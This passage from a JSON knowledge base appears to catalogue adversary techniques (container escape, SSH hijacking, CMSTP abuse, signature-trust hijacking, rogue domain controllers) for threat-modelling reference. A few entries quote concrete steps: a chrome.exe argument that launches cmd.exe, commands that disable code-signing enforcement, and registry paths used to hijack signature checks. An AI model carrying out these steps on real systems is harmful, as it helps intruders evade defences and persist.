signals may allow malware to continue execution, but unlike Trap this does not establish Persistence since the process will not be re-invoked once actually terminated.", "detection": ""}, {"attack_id": "T1611", "name": "Escape to Host", "tactics": ["privilege-escalation"], "platforms": ["Windows", "Linux", "Containers", "ESXi"], "description": "Adversaries may break out of a container or virtualized environment to gain access to the underlying host. This can allow an adversary access to other containerized or virtualized resources from the host level or to the host itself. In principle, containerized / virtualized resources should provide a clear separation of application functionality and be isolated from the host environment. There are multiple ways an adversary may escape from a container to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets. Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a Container Administration Command. Adversaries may also escape via Exploitation for Privilege Escalation, such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine. In ESXi environments, an adversary may exploit a vulnerability in order to escape from a virtual machine into the hypervisor. Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers or virtual machines running on the host, or setting up a command and control channel on the host.", "detection": ""}, {"attack_id": "T1518.002", "name": "Backup Software Discovery", "tactics": ["discovery"], "platforms": ["Windows", "macOS", "Linux"], "description": "Adversaries may attempt to get a listing of backup software or configurations that are installed on a system. Adversaries may use this information to shape follow-on behaviors, such as Data Destruction, Inhibit System Recovery, or Data Encrypted for Impact. Commands that can be used to obtain security software information are netsh, `reg query` with Reg, `dir` with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for, such as Veeam, Acronis, Dropbox, or Paragon.", "detection": ""}, {"attack_id": "T1547.009", "name": "Shortcut Modification", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence. Although often used as payloads in an infection chain (e.g. Spearphishing Attachment), adversaries may also create a new shortcut as a means of indirection, while also abusing Masquerading to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program. Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. Browser Extensions) to persistently launch malware.", "detection": ""}, {"attack_id": "T1010", "name": "Application Window Discovery", "tactics": ["discovery"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used. For example, information about application windows could be used identify potential data to collect as well as identifying security tooling (Security Software Discovery) to evade. Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as Command and Scripting Interpreter commands and Native API functions.", "detection": ""}, {"attack_id": "T1569.003", "name": "Systemctl", "tactics": ["execution"], "platforms": ["Linux"], "description": "Adversaries may abuse systemctl to execute commands or programs. Systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked from a shell, Systemctl can also be integrated into scripts or applications. Adversaries may use systemctl to execute commands or programs as Systemd Services. Common subcommands include: `systemctl start`, `systemctl stop`, `systemctl enable`, `systemctl disable`, and `systemctl status`.", "detection": ""}, {"attack_id": "T1087.003", "name": "Email Account", "tactics": ["discovery"], "platforms": ["Windows", "Office Suite"], "description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs). In on-premises Exchange and Exchange Online, the Get-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session. In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.", "detection": ""}, {"attack_id": "T1497.003", "name": "Time Based Checks", "tactics": ["stealth", "discovery"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may employ various time-based methods to detect virtualization and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. This may include enumerating time-based properties, such as uptime or the system clock. Adversaries may use calls like `GetTickCount` and `GetSystemTimeAsFileTime` to discover if they are operating within a virtual machine or sandbox, or may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.", "detection": ""}, {"attack_id": "T1218.003", "name": "CMSTP", "tactics": ["stealth"], "platforms": ["Windows"], "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft. CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.", "detection": ""}, {"attack_id": "T1563.001", "name": "SSH Hijacking", "tactics": ["lateral-movement"], "platforms": ["Linux", "macOS"], "description": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair. In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. SSH Hijacking differs from use of SSH because it hijacks an existing SSH session rather than creating a new session using Valid Accounts.", "detection": ""}, {"attack_id": "T1029", "name": "Scheduled Transfer", "tactics": ["exfiltration"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability. When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel or Exfiltration Over Alternative Protocol.", "detection": ""}, {"attack_id": "T1021.002", "name": "SMB/Windows Admin Shares", "tactics": ["lateral-movement"], "platforms": ["Windows"], "description": "Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba. Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB, to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task/Job, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.", "detection": ""}, {"attack_id": "T1525", "name": "Implant Internal Image", "tactics": ["persistence"], "platforms": ["IaaS", "Containers"], "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike Upload Malware, this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image. A tool has been developed to facilitate planting backdoors in cloud container images. If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a Web Shell.", "detection": ""}, {"attack_id": "T1572", "name": "Protocol Tunneling", "tactics": ["command-and-control"], "platforms": ["ESXi", "Linux", "macOS", "Windows"], "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel. Protocol Tunneling may also be abused by adversaries during Dynamic Resolution. Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets. Adversaries may also leverage Protocol Tunneling in conjunction with Proxy and/or Protocol or Service Impersonation to further conceal C2 communications and infrastructure.", "detection": ""}, {"attack_id": "T1218.002", "name": "Control Panel", "tactics": ["stealth"], "platforms": ["Windows"], "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. Malicious Control Panel items can be delivered via Phishing campaigns or executed as part of multi-stage malware. Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists. Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.", "detection": ""}, {"attack_id": "T1599.001", "name": "Network Address Translation Traversal", "tactics": ["defense-impairment"], "platforms": ["Network Devices"], "description": "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses. When an adversary gains control of a network boundary device, they may modify NAT configurations to send traffic between two separated networks, or to obscure their activities. In network designs that require NAT to function, such modifications enable the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In network designs that do not require NAT, adversaries may use address translation to further obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. Adversaries may use Patch System Image to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities.", "detection": ""}, {"attack_id": "T1608.002", "name": "Upload Tool", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications. Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.", "detection": ""}, {"attack_id": "T1547.005", "name": "Security Support Provider", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.", "detection": ""}, {"attack_id": "T1036.011", "name": "Overwrite Process Arguments", "tactics": ["stealth"], "platforms": ["Linux"], "description": "Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating system stores command-line arguments in the process’s stack and passes them to the `main()` function as the `argv` array. The first element, `argv[0]`, typically contains the process name or path - by default, the command used to actually start the process (e.g., `cat /etc/passwd`). By default, the Linux `/proc` filesystem uses this value to represent the process name. The `/proc//cmdline` file reflects the contents of this memory, and tools like `ps` use it to display process information. Since arguments are stored in user-space memory at launch, this modification can be performed without elevated privileges. During runtime, adversaries can erase the memory used by all command-line arguments for a process, overwriting each argument string with null bytes. This removes evidence of how the process was originally launched. They can then write a spoofed string into the memory region previously occupied by `argv[0]` to mimic a benign command, such as `cat resolv.conf`. The new command-line string is reflected in `/proc//cmdline` and displayed by tools like `ps`.", "detection": ""}, {"attack_id": "T1550", "name": "Use Alternate Authentication Material", "tactics": ["lateral-movement"], "platforms": ["Containers", "IaaS", "Identity Provider", "Linux", "Office Suite", "SaaS", "Windows"], "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process. Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through Credential Access techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.", "detection": ""}, {"attack_id": "T1597.001", "name": "Threat Intel Vendors", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures. Adversaries may search in private threat intelligence vendor data to gather actionable information. If a threat actor is searching for information on their own activities, that falls under Search Threat Vendor Data. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Exploit Public-Facing Application or External Remote Services).", "detection": ""}, {"attack_id": "T1011", "name": "Exfiltration Over Other Network Medium", "tactics": ["exfiltration"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", "detection": ""}, {"attack_id": "T1602.002", "name": "Network Device Configuration Dump", "tactics": ["collection"], "platforms": ["Network Devices"], "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.", "detection": ""}, {"attack_id": "T1589", "name": "Gather Victim Identity Information", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations. Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about users could also be enumerated via other active means (i.e. Active Scanning) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA /methods associated with those usernames. Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).", "detection": ""}, {"attack_id": "T1560", "name": "Archive Collected Data", "tactics": ["collection"], "platforms": ["Linux", "macOS", "Windows"], "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.", "detection": ""}, {"attack_id": "T1553.003", "name": "SIP and Trust Provider Hijacking", "tactics": ["defense-impairment"], "platforms": ["Windows"], "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all ) and are identified by globally unique identifiers (GUIDs). Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: * Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file). * Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk. * Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex). * **Note:** The above hijacks are also possible without modifying the Registry via DLL search order hijacking. Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.", "detection": ""}, {"attack_id": "T1185", "name": "Browser Session Hijacking", "tactics": ["collection"], "platforms": ["Windows"], "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques. A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet. Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights. Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as Sharepoint or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.", "detection": ""}, {"attack_id": "T1021", "name": "Remote Services", "tactics": ["lateral-movement"], "platforms": ["Linux", "macOS", "Windows", "IaaS", "ESXi"], "description": "Adversaries may use Valid Accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP). They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain, or management platforms for internal virtualization environments such as VMware vCenter. Legitimate applications (such as Software Deployment Tools and other administrative programs) may utilize Remote Services to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer. Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.", "detection": ""}, {"attack_id": "T1071.003", "name": "Mail Protocols", "tactics": ["command-and-control"], "platforms": ["Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.", "detection": ""}, {"attack_id": "T1556.007", "name": "Hybrid Identity", "tactics": ["defense-impairment", "persistence", "credential-access"], "platforms": ["IaaS", "Identity Provider", "Office Suite", "SaaS", "Windows"], "description": "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID: * Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud * Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory * Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials. In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies. In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.", "detection": ""}, {"attack_id": "T1595.002", "name": "Vulnerability Scanning", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use. These scans may also include more broad attempts to Gather Victim Host Information that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts. Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Exploit Public-Facing Application).", "detection": ""}, {"attack_id": "T1059.009", "name": "Cloud API", "tactics": ["execution"], "platforms": ["IaaS", "Identity Provider", "Office Suite", "SaaS"], "description": "Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, PowerShell modules like Azure for PowerShell, or software developer kits (SDKs) available for languages such as Python. Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies. With proper permissions (often via use of credentials such as Application Access Token and Web Session Cookie), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.", "detection": ""}, {"attack_id": "T1596", "name": "Search Open Technical Databases", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans. Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services or Trusted Relationship).", "detection": ""}, {"attack_id": "T1218.015", "name": "Electron Applications", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams. Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS. The Chromium engine is used to display web content and Node.js runs the backend code. Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework. For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\system32\\cmd.exe /c calc.exe`). Adversaries may also execute malicious content by planting malicious JavaScript within Electron applications.", "detection": ""}, {"attack_id": "T1207", "name": "Rogue Domain Controller", "tactics": ["defense-impairment"], "platforms": ["Windows"], "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys. Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.", "detection": ""}, {"attack_id": "T1553.006", "name": "Code Signing Policy Modification", "tactics": ["defense-impairment"], "platforms": ["macOS", "Windows"], "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS. Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions. Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, Modify Registry, rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory. Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS. Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts. To gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct Exploitation for Privilege Escalation using a signed, but vulnerable driver.", "detection": ""}, {"attack_id": "T1610", "name": "Deploy Container", "tactics": ["execution"], "platforms": ["Containers"], "description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, 